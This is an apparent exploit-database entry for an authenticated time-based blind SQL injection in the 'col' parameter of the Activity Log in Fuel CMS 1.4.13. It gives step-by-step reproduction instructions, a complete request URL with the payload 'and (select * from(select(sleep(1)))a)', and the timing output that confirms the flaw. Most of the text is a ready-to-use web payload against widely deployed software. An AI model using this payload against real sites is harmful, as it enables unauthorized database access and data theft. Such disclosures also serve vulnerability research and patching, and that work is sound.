Fuel cms 1.4.13 col blind sql injection (authenticated) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2021-11-15 | Type : webapps | Platform : php
This exploit / vulnerability Fuel cms 1.4.13 col blind sql injection (authenticated) is for educational purposes only and if it is used you will do on your own risk!


[+] Code ...

# Exploit Title: Fuel CMS 1.4.13 - 'col' Blind SQL Injection (Authenticated)
# Date: 2021-04-11
# Exploit Author: Rahad Chowdhury
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/archive/1.4.13.zip
# Version: 1.4.13
# Tested on: Kali Linux, PHP 7.4.16, Apache 2.4.46

Steps to Reproduce:
1. At first login your panel
2. then go to "Activity Log" menu
3. then select any type option
4. their "col" parameter is vulnerable. Let's try to inject Blind SQL Injection using this query "and (select * from(select(sleep(1)))a)" in "col=" parameter.

POC:
http://127.0.0.1/fuel/logs/items?type=debug&search_term=&limit=50&view_type=list&offset=0&order=desc&col=entry_date
and (select * from(select(sleep(1)))a)&fuel_inline=0

Output:
By issuing sleep(0) response will be delayed to 0 seconds.
By issuing sleep(1) response will be delayed to 1 seconds.
By issuing sleep(5) response will be delayed to 5 seconds.
By issuing sleep(10) response will be delayed to 10 seconds